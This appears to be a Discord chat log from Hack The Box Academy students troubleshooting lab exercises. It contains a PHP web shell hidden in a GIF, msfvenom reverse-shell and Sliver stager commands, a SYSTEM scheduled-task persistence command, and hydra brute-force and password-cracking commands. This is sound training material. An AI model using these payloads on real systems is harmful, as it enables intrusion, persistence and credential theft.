#modules

ah omg

i havent thought that the flag is in the root directory, but yes int he question was /flag.txt

it happens xd

One message removed from a suspended account.

One message removed from a suspended account.

Go for the releases

does anyone that knows coding know how to open pdf files with a password on it? i got allot of pdf files but i seem to have forgetten the passwords for all. i know i need john the ripper and some other stuff if anyone knows please send a dm.

Hey all, first message here, is anyone available to help with 'the live engagement' on the Shells and Payloads Module in academy, is anyone free.
Module: https://academy.hackthebox.com/module/115/section/1139
I'm constantly getting errors that nothing in the forum has been able to help with.

The issue is with Host 2 172.16.1.12 with the exploit 50064.rb https://www.exploit-db.com/exploits/50064

i get the following in msfconsole
msf6 exploit(50064) > run

[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created.

I changed the script slightly as i noticed there was a similar section to this split error but commented out.

I then get a 404 instead and authentication failed

John has a lot of parsers

dumb question, but are the relesaes in the github repositories?

Yes
In the right part of the GitHub repo you will see a “Releases” link

then how can i crack it

With John

https://tenor.com/view/confused-confused-face-confused-look-im-confused-im-so-confused-gif-16067865999736184254

ah, I see it. Thank you. I'll see if that works. appreciate it.

what do you have set for the OPTIONS ?

appreciate it bro

was impatient the first time so i didnt let hydra fully bruteforce

password attacks - Protected files

this module will help you

pdf2john.py PDF.pdf > pdf.hash if u just want that

Maybe you can use access from a previous question in this assessment to enumerate users with RDP access and target that user?

hey guys, so I'm a bit confused. If I install the HTB Parrot ISO and run it locally on a hypervisor (virtualbox or vmware) I don't need to play with the instances on the site right? Assuming I'll be connecting to the HTB network trough the openvpn

trying to paste it it won't let me
VHOST: blog.inlanefreight.local
TARGETURI: blog.inlanefreight.local
RHOST: 172.16.1.12
USERNAME: admin
PASSWORD: admin123!@#
LPORT: 4444

yeah you can connect through open vpn, there are a couple of times here and there it can get a bit tricky with some of the targets, but i much prefer it

try unsetting TARGETURI

hahah are you serious, thats worked. But it had TARGETURI as mandatory! I didn't think it would let me run it without TARGETURI

I've been at this for hours, thank you!!

np 😉

i think we would only need it , if it were trying to login to a page such as http://172.16.1.12/login . In which case, for the TARGETURI we would set it to 'login" or "/login"

Yes i did that too, i also tried reusing credentials, from the winrm session, but the issue seems that rdp is just not working. Because i tried bruteforce all users and all their accounts are inactive.

isn't it "/" by default? what does that mean?

or is it just the same as having it blank

correct

it's the first time i've seen in msfconsole where a required field can be left blank though 🤷‍♂️ thats what tripped me up i think

Hey CB which question is it you're stuck on? Do you have the link for what stage your at? This seems familiar to me as I think i had the same issue, i remember trying the biggest dictionary, but it turns out one of the other dictionaries was what i needed

I'm not able to copy the files that I download in my computer to the spw machine. It's probably a stupid thing, but I can't. Anyone has the same issue?

You can SSH / SFTP to your Pwnbox. The credentials and IP would be listed

..I think..

Yeah.. so expand your Pwnbox to full screen, you'll see the hostname in the URL, and credentials on the desktop

Thanks

That should be a bit more obvious

as in.. on the platform, but it could be it is described in an introductory module

I will try, thank yoy

Yup, confirmed you can SSH/SFTP

Is the Windows Fundamentals module overkill ? It's very thorough, geared more towards administration

Active Directory Enumeration & Attacks
Living Off the Land

rdping displays a blackscreen

with the console being stuck at
[16:28:11:802] [6730:6731] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[16:28:11:802] [6730:6731] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp

what about rdesktop or remmina

lemme try but why would xfreerdp not work:3

iono🤷‍♂️

ok sounds like xfreerdp skill issue

but why

thats why

GenericWrite can be used to targeted Kerberoasting right?

Hello DACL 1 skill assessment question 3.
I changed the owner of the NETWORK ADMINS to mathew and give him FullControl over it but when i readLAPS i dont have any results. I can't ping ws01.inlanefreight.local as well

if so, the answer in AD enum & attacks - Access Control List (ACL) Abuse Primer needs to be changed cuz it says GenericAll (which is true but only cuz GenericWrite is a subset of it) so the answer should be GenericWrite

I think those credentials only apply to traverse.jar

where rockyou.txt is located on pwnbox

found it

did someone sucessfully install sqsh, i see its hell pain to install it

i dont know why all that tools that are mentioned in entire path, are not installed by default on pwnbox

I think I used it once

Impacket Mssqlclient >

Having trouble with
Password Attacks
Network Services:

Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer

Command im running is:
hydra -L username.list -P password.list rdp://10.129.141.43 -t 32

I know the answer is c** and 7** but cant get it to actually populate through hydra

im using correct password

Looks like rdp on your command

What about with -windows-auth

oh shoot im sorry had to edit. its the rdp one

yeah it works now, i didnt think to use windows auth

you could try netexec if hydra isnt working or lowering your threads

actually... just had to change to t1 yup

just lowered the threads and it worked

Hello, good night, can someone tell me the answer to this question: "Enumerate the hostname of your target and submit it as the answer. (case-sensitive)" in the module Network enumeration with nmap???

is it a windows machine?

Ubuntu

try using -A or -sC

I have already tried to execute these coamndos and always appears wrong answer

dm the results

-sS -sC -sV -O

That will give you the histnsme

"sudo nmap -sS -sC -sV -O [IP]" like that?

Yep

-Pn if it’s a windows machine as well

Windows will sometimes block icmp pings

Is anyone able to get the flag on the File Inclusion, LFI and File Uploads section? When I go to cat the flag file, the only output I'm seeing is GIF8 rather than the actual flag.

Tried resetting the target a few times but it yields the same result. Let me know if anyone else has the same issue.

haven't seen that issue

which payload are you using?

I was doing the basic GIF payload and it does have RCE, but let me try another payload to see if it has the same problem

mine was prepended with gif8 but it still worked

i just tried again and it worked for me, are you using the right payload?

Weird. Using the GIF payload means the flag only spits out GIF8 for me, but using the ZIP payload results in me getting the actual flag, and a different file name at the root directory despite it being the same target

what command did you use to create the gif?

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

It gives remote code execution but the flag file doesn't work for some reason

ahh

Brb, OS update

i was able to do it and read the flag with the gif

look at the filename closely, did it prepend gif8 and then you included that in the filename when you catted it?

Hmm, I'll give it another shot when my laptop is done updating, I think I might've missed doing that

yeah at first it didn't work but it was because the GIF8 got tacked on to the first part of the name, after removing it, it worked fine

Yeah, I forgot to remove GIF8 from the start of the flag file name. Thanks!

Very simple mistake to make

I'm running into the same problem. How did you fix it?

zombiiieee said how they fixed it in the very next message, if that helps

Right, I saw that @eager ledge modified the invoker.java file. I did that, and I'm still getting this jumbled mess. Ugh!

Hey, I'm doing the "Information Gathering - Web Edition" Skill Assessment, but I'm unable to complete the question related to crawling inlanefreight.htb for the email address.

All of the crawlers I used on that domain and the subdomain are coming back with no results for emails found

Does anyone have an idea what I might be doing wrong?

I also haven't been able to get whois to output anything more than a "400 bad request". The command I've been using is "whois -h inlanefreight.htb:<port> <ip addr>

Can someone help me with the Advanced Xss and CSRF exploitation module - skill assessment?

I was able to become moderator, and find a way to execute XSS (very limited though); now i'm stuck on how to exfiltrate the admin page

with mod powers you can access another page that you couldn't before

Does anyone playing battleground now

hmm, interesting...i'll try something...tks for now

can someone help me Wi-Fi Penetration Testing Basics - Skills Assessment?
after Aireplay-ng -0 -5 workstation 02:00:00:00:02:00 and even spoof MAC as that address + 2 boardcasting address
(I've got ESSID and BSSID)
then try airodump-ng w/ all band (abg) , I can't get ANY handshake after an hour
after getting handshakes, I can crack pw and connect
the point is, how to get handshake when 02:00:00:00:02:00 is using all abg bands, and MAC spoofing may not work?

Are you sure you're not mixing something up? Should not take an hour, only took me a few seconds to capture the required info.

like the ssid/bssid

hey guys . so im currently doing the metasploit portion of the introduction and these ports and services came up
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
25/tcp filtered smtp
111/tcp open rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
it now wants me to search using searchsploit but when i do, the ssh type is too new/no exploits. am I missing something?

yeah, after I got ESSID (H**), I though this assessment should be Easy one
so I go aireplay-ng -0 -5 (but --test not work) and just airodump-ng -c 1

dm me

bump

Any help with my issue?

I modified the invoker.java file, as instructed. When I try to open fatty-server.jar, I end up with a weird jumbled mess.

That module is such a pita. I can't really offer much help beyond a lot of people watched ippsec's video on "fatty", he goes through it

Yeah, I've seen some comments about how it's poorly made. I didn't know about ippsec, I'll look them up. YouTube?

yeah. he's a legend. https://www.youtube.com/watch?v=3bvKLj0akMM

what module/section exactly

module 77 section 843?

i think lol

i'm not looking that up

just say the names..

publix exploits

public

there are multiple introduction modules, multiple moduels with metasploit

https://academy.hackthebox.com/module/77/section/843

you're going to have to say the exact ones

that's the module "getting started" and section "public exploits"

the target that spawns has only one port, try visiting it in a web browser. the question kind of gives it away (it says it'a a web server)

you're not meant to nmap scan

Awesome, thank you. I'm hoping this will help address the issue.

Ugh, I figured it out. I really hate the way they framed the questions.

"What is API key the inlanefreight.htb developers will be changing too?"

The way the question was framed the question made me assume the info had to be on the original domain. Kinda frustrating to do everything right, but on the wrong domain and just assume that because of vhosting that I was putting in the commands for recon spider wrong.

Maybe I'm just not cut out for pen testing. It seems like I always get something wrong and have to spend hours just because of simple little nuances like this.

ahhhh i see. okay, i will investigate.

yeah no im lost dude. i looked up the plugin and the exploit didnt work(probably wrong wordpress exploit)

thats all that comes up though. when i execute the exploit it just gives me a crisp high five for executing nothing lol

did you try searchsploit on the plugin

yeah, it comes up with the same exploit in searchsploit and in metasploit

did you setup all your metasploit options

yes. the only one needed was RHOSTS, I set to RHOSTS => 94.237.58.155

probably need a port too

that web server is only running on that specific port

OH

also what file you want to read

type options and make sure you read them and have them all the required ones filled out

so the 5 digit at then end

yes

okay, i was tcp porting to 22

bad verbage sorry

nah, when the target contains the port the module challenge is going to be specific to that port

i see. ill reattempt

they're just docker containers that get spun up publicly so they change the ip/port all the time when you spawn them

you are the best man. thank you. that took me far too long haha

alot of nuances to take in this first week

man no lie lol

Hello guys. I need some help, I'm just starting out, and after going to forum and then Google nothing really helped. I'm at "Getting Started" Module and there is optional exercise. I managed to figure out where to get the banner, but the command is just not working.

You're trying to connect to port 22

That is not the correct port

Look at the IP provided for your instance (and port number)

Oh thanks! Now it worked

👍

Hi, I have an issue with the flag 'Wi-Fi Penetration Testing Basics' skill assessment and question 1. The question is: What is the name of the WiFi network with the BSSID D8:D6:3D:EB:29:D5?
When I enter the name of the WiFi network, I get an incorrect answer.

wifi@WiFiIntro:~$ iwlist wlan0 scan | grep 'Cell|Quality|ESSID|IEEE'
Cell 01 - Address: D8:D6:3D:EB:29:D5
Quality=70/70 Signal level=-30 dBm
ESSID:"<REDACTED>"
IE: IEEE 802.11i/WPA2 Version 1

where can i report a deadlink found in a module ?

#1234357888114364508

ty

You're welcome

helen b. kellerin

ill give you a clue 😉

Oh, my bad 🙏

Hello, i'm in the Pivoting, Tunneling, and Port Forwarding module and the RDP and SOCKS Tunneling with SocksOverRDP, i already disable the real time protection but got this error message, any hint ? ty

Hi! Anyone completed Wifi testing module?
almost finished module and skills assesment, getting some troubles while connecting to hidden network (got 2 previous flags)

Try not to connect to the network of the 1st question

You can connect to something not hidden 👀

Problem at "getting started" When I try to check the content of flag.txt by using cat/ head It says: command not found.

Download the file locally, and then try to get the contents of it

Thanks!

Did you download the x86 or x64 in the github repository releases?

Does anyone know if HTB academy will offer a sale on Cubes for blackfriday?

64x

Hey thanks for responding
lol if it’s only a dictionary thing
That’s the question:

Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.

That’s where I am:

https://academy.hackthebox.com/module/144/section/1253

no

no they don't offer

Module: Attacking common services
Section: Attacking email services
I found password for previously found username, am i supposed to login to mail via client or i have to do something different?

anyone finished Windows Lateral Movement module Skills Assessment? RDP seems to be unstable as I was always getting disconnected from the session

I also moved laterally to another user and it seems the flag is not in the Desktop folder wtf

You should find a username, and then its password.

yeah i found both

do i need to authenticate over pop3 and then retrive all emails?

first i bruteforced username, then password

with provided lists

Should I be using NAT or bridged mode on my VM? I seem to be having a lot of issues with stuff either constantly timing out or connection dropping etc

solved it

Anyone did the SOC -> Digita lForensics -> Evidence module?

https://academy.hackthebox.com/module/237/section/2609

did you have to make your own lab? all the tools are not on the machine... even the free/FOSS ones

did you do a gci c:\ -path . -filter *flag* -recurse or similar?

Hello, does anyone know how to get the jimmy user password in the ADCS module skill assessment? I used hashcat to burst without results, can you give me some tips

i did bro..im still on the SUPPORT host

i havent done this module so im not able to be too terribly helpful, but are expecting to find the flag in Docs or have you been informed by the lab to find it there?

just as a sanity check, yknow, sometimes they like to mix it up

it was explicitly told in the questions bro

gotcha

are you doing ADPT job role path too?

No, i was just trying to offer a suggestion im on SOC Path at the moment

!mods

did something change with academy? now I have to login like 4 times throughout the day instead of once each day

I ma having problems with a module Using CrackMapExec - Stealing Hashes.

The chisel is up and running but when i try to connect to a share on 172.16.1.5 the connection just drops.
I used a nmap scan and its saying that the host is up

proxychains4 -q nmap -sV -Pn 172.16.1.5
Nmap scan report for 172.16.1.5
Host is up.
All 1000 scanned ports on 172.16.1.5 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

hello! can someone help me with a pwn challenge?

hey guys might sound a bit silly yet can anyone elaborate the question cause i really don understand what exatcly its asking for "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) "

try with --smb-timeout 5

it just drops, not good

have you tried setting this option ?

Yes

Perhaps not in this Host

This SA was constructed as to pivot from one host to another

yes, it doesent work. I am at the beginning of the module and proxychains4 are configured from the module before, so it should be working

better to include which module/section you're on

You can user the auto-reconnect flag in xfreerdp

im doing ACL Enumeration AD

We need to configure proxychains to use the Chisel default port TCP 1080. We need to make sure to include socks5 127.0.0.1 1080 in the ProxyList section of the configuration file as follows: socks5 127.0.0.1 1080

i just dont understand what exactly the question is asking for

idk, that timeout thing usually does the trick for me; I did the CME module using ligolo-ng instead, so I can't help much which chisel

If you are using the Pwnbox with proxychains, run it with sudo

i am using my own machine but ill give it a try just in case

The section shows you how to enumerate which access rights a user has over groups, it wants you to input the access rights 'forend' has over the 'gpo management' group

i see!

ima try that out thanks man

In the documentation module, anyone manages to extract the example report from the archive in the resources? I'm getting an error.

Thank you 🙂

not familiar with the module you're worknig but you might try a cmdlet like get-acl 'AD:\OU=Domain Controllers,Dc=contoso,DC=com' | select -exp Access | ?{$_.IdentityReference -match 'Everyone'}

or whatever is referenced in the section

i got the flag, i was using pwn box. My computer just wont do it.

ive already enumrated the users rights i just dont get what exactly the question is asking for

Its asking for the name of the Object ACE if im not mistaken

I think I found an error in the Command Injection Module
On the lab under section "Identifying filters", the answer that is considered correct is actually not.
The new-line "\n" character gets rejected with invalid input in the exercise, so I cant be the correct answer the correct answer should be "&"
Nevermid. It works properly once URL encoded

Post in #1234357888114364508 if you believe there is a mistake

Aha thanks. Do they check those?

Hm you know what. They probably wanted it to be url encoded. still in that case it seems like there are 2 operators that are not blacklisted

actually no i think i jumped to quickly over here. If its url encoded it works properly

yes they do

hey can a mod dm me for an academy vpn question?

has anyone else ever had trouble using "execute" within sliver? I'm currently doing the sliver c2 module - maintaining persistence with scheduled tasks, within a SYSTEM shell, if I run the command:
execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr "powershell.exe -enc <BASE64HERE>==" /ru SYSTEM'
It works fine, verified it in the task scheduler GUI.

However - if I try the exact same command but within the sliver session (still as SYSTEM) - the command runs, I get no output & checking the task scheduler, nothing is there.. Scratching my head on troubleshooting this one
sliver (http-beacon1) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater2 /tr "powershell.exe -enc <BASE64HERE>==" /ru SYSTEM'

Did anybody pass assessment of Whitebox attacks? I need a hint. I think that the 1st step should be to exploit type juggling with password of Larry. I’ve tried different ways to calculate magic hash (using salt), but all my vocabularies dont provide it to me.

I saw your message in the forum, couldn’t respond cause I’m at the phone
DM and I’ll send you a couple of pointers

Hello, I was scammed out of money by a fake escort who pretends to be someone else on Instagram. Can someone help me recover my Instagram account?

I also have part of his number

No one here can help you with that, you need to reach out to Instagram

Just ask him to give you the money he has left and you will help. I bet he will fall for it. 😄 😄 haha

This is not instagram support, we can't help you with that

Someone have same issue as me that I cant connect into windows RDP in Active Directory Enumeration & Attack module? I am using PwnBox and xfreerdp to connect.

windows boxes are always annoying - could be

which section?

Internal Password Spraying - from Windows and LLMNR/NBT-NS Poisoning - from Windows both seems not working, I have waited hour and still the same issue

if this screenshot helps a little

Put the password in quotes

/cert:ignore

oh that was the issue thanks, weird that linux works without quotes

Ooo

strange didnt had to put the password within quotes

**Module: **Intro to C2 Operations with Sliver [Probing the Surface]

Steps I followed based on the module:

# SLIVER-CLIENT
profiles new --http 10.10.15.200:8080 --format shellcode htb

stage-listener --url tcp://10.10.15.200:4443 --profile htb

http -L 10.10.15.200 -l 8088

generate stager --lhost 10.10.15.200 --lport 4443 --format csharp --save staged.txt

# MSFVENOM
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.15.200 LPORT=4443 -f aspx > sliver.aspx

I copied the payload from staged.txt to sliver.aspx and uploaded via the website but no call back

Before

After

What is the problem?

Hey guys, I'm a bit stuck in the footprintin module. Its telling me to enumerate the SMTP service further and find the username, and i've tried VRFY, i've tried smtp enum in msfconsole with the provided wordlist. Am I missing a step, or what else could I do?

Was it you that DM me in the forum about the same issue?

No

Just working on it

Don’t remember having any issue
But can check when I get home

Sure thing. Thanks

smtp-user-enum tool should work - takes quite a long time

I got a list of usernames, but they were default users like root, admin etc and I entered them in anyway and they were all wrong

use the wordlist provided

I did, I used it in metasploit. Is there another way I can use it? Metasploit just gave me a banner

At least for me the tool i mentioned worked - so you can use that I guess

But somehow not mentioned in the section - kinda strange

Probably just wanted us to do research tbh

Could be...

Always was wondering how in the world it would be possible to complete the CPTS path within 43 days - but now with guided mode it could be even possible within 22 days - lol

How much longer do you have?

still not finished yet - took a break for about a year

was getting annoyed by it

If you have some level of experience, and run into little to no issues it's possible

My best advice is to ignore the estimate

It's only there for businesses to get an estimate for how long it should take their employees, that's it

It doesn't take into account any skill issue, technical issue, or other extenuating circumstances

Cant even blame you, tech in general can be frusturating I just love it lol

Marcie could you help me if you have time? It feels like i've done every step possible

Actually my goal is to just finish it for completness - but for sure no exam

Nah

I was gonna do that, but then I learned that its 10x harder then the OSCP so... I changed my mind

Im going for CPTS too, had some hold ups on the way though with some of the modules in the pathway

You need to adjust the timer for smtp-user-enum

-wwwwwwwwwwwwwwww

I adjusted it to 300 seconds the second time I tried, should it be longer?

That's a long time

Also are you sure you adjusted the right thing

20-25s is what's average

This is the command I did: nmap 10.129.79.223 -p25 --script smtp-enum-users -w 300

Use the smtp-user-enum tool

Not the nmap script

Because if you use the nmap script you also need to put the variables in

The -w that you're tacking on is only for nmap, not the script being used

Ohhhhh, you're a lifesaver thank you so much

@fathom pendant do you know a rough percentage of how many pass the exam - just wondering

[*] Sliver implant stager saved to: /home/htb-ac-799850/staged.txt

[*] Session b83648a2 COMBINED_PACE - 10.129.172.70:49692 (web01) - windows/amd64 - Tue, 29 Oct 2024 15:44:23 CDT

sliver > use b83648a2-784f-4d1e-a860-635a1b506159

[*] Active session COMBINED_PACE (b83648a2-784f-4d1e-a860-635a1b506159)

sliver (COMBINED_PACE) > ```

Got a callback with no problem

100% of cert holders have passed

but for sure not first try

The attempt/fail rate isn't released by htb

This is scientifically proven to be correct!

sure

why is it a secret?

Did you know 100% of people that intake Dihydrogen Monoxide eventually die

got it

HTB just doesn't release the stats ¯_(ツ)_/¯

One could get a felling by reading the cpts forum - lol

Eh

have you tried using dnsenum and entering the results found after the brute force?
dnsenum --enum inlanefreight.com -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -r

What are you currently trying and what results do you get

is it ok to dm you?

Sure

bro I tried to perform double RDP in an another host inside the network using non standard port and it does not even accept the password I’ve got..It says the user has no RDP rights towards that host.

I already setup pivoting and tried to look for open ports in that other host and just does not return anything

idk if the lab is broken or do I need to do some firewall bypass with nmap so I can see some ports

Try other type of Remote Service

Okay so this is the cmd I used: smtp-user-enum -M VRFY -U ./footprinting-wordlist.txt -t STMIP -m 60 -w 20 10.129.168.3 its working just not returning any results, is there something I typed wrong?

idk man, I was trying to look for open ports and nmap just does not get through pivoting..it returned nothing thats why I am not able to know what specific port is opened on that host so I can pivot..Most likely it is using a non standard port for the other type of remote service

host unreachable?

-t is the ip...

It wont.... I had some discussion with some other users. There is a work around to perform it but you can rely in the information on the txt file

The services should be methodically assigned to non standard ports. So if you found the service running on a specific port in a Host, it should be the same non-standard port to the other Hosts in the environment

You can use the port scan you did for the first target as a baseline

got it thank you!

Module: Sqlmap Essentials
Section: Attack Tuning
What's the contents of table flag6? (Case #6)
how can i know which prefix to use im so confused

So what's with all of the Mass IDOR Enumeration section being about a GET request when the lab is a POST request? This is frustrating that nothing matches compared to every other module before it.

cuz real world targets are using all request types

and this theme is of switching is used alot in the academy btw

Oh come on, what is this, OffSec now?

especially with skill assessments

I understand on the skills assesment, but every single module before this one walks you through it.

offsec will use trace or something stupid just to fail u the exam

I have OSCP from this year, I know the stupidity they pull. This module is reminding me of that pain of things not matching up.

https://academy.hackthebox.com/module/147/section/1315
Module I need assistance with:
Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer.

I have the hashes for the users, but can't hashcat is being exhausted

What command for hashcat did you use, with which --flags

Your not supposed to use hashcat to crack the password

It says your supposed to be using secretsdump.py on the SECURITY, SAM and SYSTEM file

Or dumping the LSA remotely, with crackmapexec/nxc.

This module looks fun

Oh damn, im back. Hashcat decided to start working so I got it 🙂
@strange pivot @indigo rune

https://academy.hackthebox.com/module/163/section/1544

stuck on the last question, I cant figure out how to use socat to get a rev shell

So no cube sale on Blackfriday?

<@&861185840277487616>

Rats. I was slow.

I was actually casually reading the message while distracted on something else until mid reading i was like: "wait a minute this is not supposed to be here" 😅

https://tenor.com/view/wait-what-meme-wait-a-minute-gif-14484132

Looked about like this I'm guessing.

hi guys, i'm in the cracking pasword module. I need to connect to evil-winrm but i get this error
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Error: Exiting with code 1

any advice?

Cry

i did it 🙂

It's a weird ruby error that doesn't detect openssl

I don't think there's a fix aside from reinstalling ruby/os

https://tenor.com/view/rage-gif-17985852

Question for anyone that can answer, I work with a lot of Windows based machines and on top of learning Pentesting I would like to also be able to keep up with my coworkers on Windows, would that module be the right one to start with?

no result 😦

the starter one. then move forward if you have a path pick one use a vm

Awesome. Thank you.

i'll be honest if you cannot handle at LEAST 2 os's this is not the job for you

but a good vm of kali normal windows

start with the starter stuff keep to fundimentals and work up (they are marked)

which module are you referring to

That is the idea. Basic stuff then go from there

"Windows Fundamentals"

if you feel that you're lacking or if you want to brush up, then that's fine

if you're planning on learning pentesting then you will have to learn more than just that though

I would like to learn basics and then focus more on pen testing. And I am semi familiar with normal windows usage, but getting more into it I think will help

then you should probably complete the Information Security Foundations path then move onto the Penetration Tester path in HTB Academy

ther are moduals legit called "fundamentals" they start at lvl 0 type basic stuff id go there first off

That is where I am currently

the Infosec Foundations path should prep you enough to start learning pentesting in the Pentester path

it's also what i did

I will start on that one tomorrow then. Thank you.

I figured the more easy things I do the better.

ya go fundimetnals > easy > move on from there my suggestion

like TwinTail said, the fundamentals are very important, so soak in as much info as you can

I have a blank notebook next to me with a few pens.

id use / suggest cherrytree

if you prefer that for notetaking then that's fine

In the bot channel?

a lot of us use Obsidian for our notes

no in kali

Its how I have learned

Gotcha

I will look into that

you can takes notes as well as tree notes (children notes of notes )

also pictures even video dropped in there so i save cheat sheets and how to's as well as "current works" or "how i did this"

I like that. I usually draw them out so that will save my hands hopefully

Thank you both

my suggestion

make a htb node
make a node for each lession

make a node for each thing (like how to fuzz") and add fuzz notes there but also a main node how to do lession xyz would be good the db is very small even with pictures

That is how I take notes now, so that will be helpful

i do main
child
child
lots of childrend per that child for each topic)

its free easy comes with kali enjoy and gl

what is the best way to ask a question about a final part of a skills test when i have to use part of but not all of the answer in my question.

im stuck and cant tell if im stupid the box is broken or if i am flat mis understanding what to do.

just ask your question with the module and section name, the question you're working on, and what you have tried

you can also explain your understanding of the situation you're in

burp says its cfide (cold fusion adobe ) this is my GUESS but i have tried using every combo of msf

i tried to fuzz

i need a direction

How come the target IP won't load in web browser? ERR_ADDRESS_UNREACHABLE, ERR_CONNECTION_TIMED_OUT
Why does pinging the target IP say "Destination Host Unreachable"?
I'm connecting to target machine thru VPN...

https://academy.hackthebox.com/module/77/section/852

msfconsole module is sending a request to is CFIDE

i tried to forward i tried to attack with 28 attacks nodda

you need vpn on its local

On its local? What does that mean?

do you not know the difference of a local and public ip ?

the ip is local so use the vpn

if im here are you are there im not local to your house but if i use a vpn i might as well be IN your home. now im local so i can touch a local network

its the same thing. with the vpn on (from the vpn file they give you) it works fine. also dont over think it i fooled myself making this harder than it was when i did it.

was that enough for you to give me a hint should i be doing msf ?
fuzzing ?

its kinda went from "do this fuzz proxy" to " whatever i am on now . i know its codlfusion just not sure where to take that info

The target IP isn't a local IP

ya it is.

10.x.x.x right?

10.129.50.247 thats a local ip bud =3

not if it's not your ip

i'd consider a local ip the ip address that's on the host you're working on

that ip is only local to a remote machine

he does not get the vpn im trying to get him to use that then it will work (tldr)

he said he was connected to the vpn

@mental tapir what are the results when you type ip a in your terminal?

cancle my question im stupid

I can't show it bc it's on my laptop next to me. I don't use Discord on the Kali Linux

🤣 all this time banging my head on a wall and all they wanted was the name.

you should still be able to since the machine is connected to the Internet, however do you see an adapter with a 10.x.x.x ip?

yes, tun0, tun1, tun3, etc

something is wrong then, you should only have 1 tunnel adapter, try killall -9 openvpn and then open the vpn again, only once

ya im sorry @dim wolf i posted the answer trying to ask the question but i had ZERO idea it was the answer i deleted it.

I kept relaunching openvpn over and over thinking I had to get new keys. It went all the way to 20 adapters listed.. Should I have CTRL+C to kill the vpn connection not just closed the terminal?

depends on how you launched it. the command i gave you will kill all instances of it. if you use & after your command it runs in the background so closing the terminal won't kill the process.

I did ip a again and it only listed 3 adapters this time after killing the rest...

great, try your connection again

im gonna go lay down i realize i just wasted 56 hours trying to answer a question i had the answer to from the first 14 min . ty for help.

OK, now it works. ty!

Wait that was premature. It's still not working. The target IP address still can't be reached... another target IP from another section in the module was working but for this one, no...

This is weird. I entered the new target IP address in the browser and it wouldn't load, then it gave me the timed out error, but then a few seconds later, it loads with the Hello world! blank html page...

Does a new VPN key have to be downloaded and loaded for each new section in the module or can the VPN key be reused from the previous section?

No, just download the VPN once. If you re-downloaded it then it'll reset the key and you'll need to respawn the target, usually after a hard refresh (CTRL+SHIFT+R)

Hi everyone, currently stuck on Advanced XSS and CSRF Exploitation skills assessment where I managed to become moderator, but I don't find the way to extract the admin.php

Try to find an exploit on the page you can now access as a moderator

When say a page that I can now access as a moderator, you mean a new page (and if this is the case maybe I don't find it yet), or you refer to a functionality that I can use now?

functionality

you can do something you couldn't before as a mod

Hi

Hello

Ok... I am soooo stuck on the NoSQL Skills Assessment II. I know that when you enter something correct it gives one response and when its wrong you get a different response. I just can't work out how to exploit 😦 Has been sending me mad for ages, I even moved on to the next module to think about it but still can't work it out

hi there!
having same issue
have u solved that?

Still hoping that someone can help me with #modules message I don't understand why it works locally and not on the target machine.

but no connection to there so we can get hadshake

Hello, trying to do this question on Linux Privilege Escalation > Capabilities. I have changed the vim so the root file does not need a log in. Not sure what the next step is to get the flag. any tips?

this is the question:
SSH to target with username "htb-student" and password "HTB_@cademy_stdnt!"
Escalate the privileges using capabilities and read the flag.txt file in the "/root" directory. Submit its contents as the answer.

still stuck? dm me your payloads and what you've tried

guys

is something wrong with wayback section from information gather

the iana.org part i got the date from the footer but htb says it's wrong.

i did it recently and didnt have any problem, are you sure you are providing the date the way they show you ?

and dont let blank space after your answer

i found a blank space before the answer :(

thanks

Yall i tried installing kali using live boot on a flash drive and i accidentally removed partiton of my c drive which contained windows and now its not booting into windows

There's not much we can do about that

Gotta follow the steps in the module.
I think there are two ways to finish. There is one that is pretty straight forward if you have scanned for devices with the module's command.

anyone had issues with running kerbrute with proxychains ?

kali@kali:~/Downloads/NXC [30-10-2024 10:46]$ proxychains4 -q /opt/kerbrute/kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.15.3 jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 10/30/24 - Ronnie Flathers @ropnop

2024/10/30 10:46:59 >  Using KDC(s):
2024/10/30 10:46:59 >      172.16.15.3:88

2024/10/30 10:47:09 >  [!] apayne@INLANEFREIGHT.LOCAL - failed to communicate with KDC. Attempts made with UDP (error sending to a KDC: error sneding to 172.16.15.3:88: sending over UDP failed to 172.16.15.3:88: read udp 192.168.153.160:35532->172.16.15.3:88: i/o timeout) and then TCP (error in getting a TCP connection to any of the KDCs)

and similar enumeration works fine with netexec

kali@kali:~/Downloads/NXC [30-10-2024 10:41]$ proxychains4 -q nxc smb DC01.INLANEFREIGHT.LOCAL -u jsmith.txt -p whatever --kerberos | grep -v 'UNKNOWN'
SMB                      DC01.INLANEFREIGHT.LOCAL 445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB                      DC01.INLANEFREIGHT.LOCAL 445    DC01             [-] INLANEFREIGHT.LOCAL\adunn:whatever KDC_ERR_PREAUTH_FAILED 

How to text in general

Read #welcome

can somone give me a IRL scenario where a user account would have DS-Replication-Get-Changes-All and is not DA?

like he is using account x and then started account y and transfered everything there?

But the gist of it is admin misconfig

I would assume account x would be deactivated then (there is a chance it isn't, but like DCSync attack is talked about everywhere that this sounds like a very lil chance)

